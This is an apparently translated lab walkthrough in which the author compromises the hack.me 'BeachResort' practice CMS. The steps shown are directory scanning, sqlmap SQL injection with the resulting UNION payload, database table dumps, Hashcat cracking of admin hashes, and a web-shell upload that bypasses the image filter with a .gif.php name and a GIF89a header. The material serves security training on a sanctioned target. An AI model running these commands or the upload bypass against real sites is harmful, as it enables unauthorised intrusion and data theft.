Hack.me: Another site for honing skills in the field of information security
- Tutorial

Good day, today will not be VulnHub 'a. Today, we consider its alternative hack.me . Which contains quite a few interesting sites for hacking on various topics. This article will cover BeachResort . According to the author, this is not typical CTF, here instead of flags, we are asked to check the site’s CMS for security, and at the same time find out the following:
- Site Administrator Name
- DB Name
- Table list
- List of all files in the root directory of the CMS
- License key
- The contents of a very secret file
Let's get started
After the start, a temporary link to a vulnerable site becomes available to us. After wandering around the site, we don’t find anything interesting on it, so let's move on to scanning hidden directories:
$ sudo dirsearch -u 'http://s60229-102657-xpo.croto.hack.me' -e php,txt,html -w /usr/share/dirb/wordlists/big.txt -x 503,403 --random-agent
Scan further:
$ sudo dirsearch -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm' -e php,txt,html -w /usr/share/dirb/wordlists/big.txt -x 503,403 --random-agent
As expected, there is an authorization form:

And since we are required to find out information about the database and its contents, we are probably dealing with SQL injection . It remains to find her:
$ sudo sqlmap -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm/login.php' --data='user=admin&pass=admin' -p user --dbms=MySQL --random-agent --batch --dbsSqlmap successfully coped with the task, issued the name of the database: supercms and such Payload :
Payload: user = admin 'UNION ALL SELECT CONCAT (0x7176707a71,0x6964745475644f6f614968737948504a5a484b496a4f476355556b4172726d4f56766d6d53755276,0x71766a6b71) - OFdY & pass
Go to the list of tables:
$ sudo sqlmap -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm/login.php' --data='user=admin&pass=admin' -p user --dbms=MySQL --random-agent --batch -D supercms --tables
The groups table is not interesting to us, the task said something about the license key. Let's look at the corresponding table:
$ sudo sqlmap -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm/login.php' --data='user=admin&pass=admin' -p user --dbms=MySQL --random-agent --batch -D supercms -T license --dump
Another 1 point is completed, it remains to look at the list of users, at the same time, probably there should be a CMS administrator name:
$ sudo sqlmap -u 'http://s60229-102657-xpo.croto.hack.me/cmsadm/login.php' --data='user=admin&pass=admin' -p user --dbms=MySQL --random-agent --batch -D supercms -T operators --dump
The admin was found, and even most of sqlmap’s passwords were decrypted for us, to find the last one, we ’ll use Hashcat :
$ sudo /opt/cudaHashcat/cudaHashcat32.bin -m 0 hashes /media/DATA/passwords/hashkiller-dict.txtAnd after a few seconds we get the required password:
2bfea2ff114ccd30d95e176a1d25346a:! Superadmin!
We try to log in and get to this page:

In general, nothing interesting, except for a page with the ability to upload an image:

Trying to load a simple shell, we get the error:

Ok, fill in b374k there , after processing the request with the Tamper Data plug-in for Firefox . All that is needed is to replace the file name in the intercepted request with b374k.gif.php , and add the signature GIF89a to the beginning of the file :

We send a request, we receive a message about a successful download. Assuming that our “shell-picture” should logically be loaded into the images directory , we try to open the file that we just uploaded:

Let's proceed to the last tasks, namely we will get a list of files and directories:

Here we find the secret.noop file , which is the last link :

All tasks are completed, you can safely send answers to the author to confirm the passage.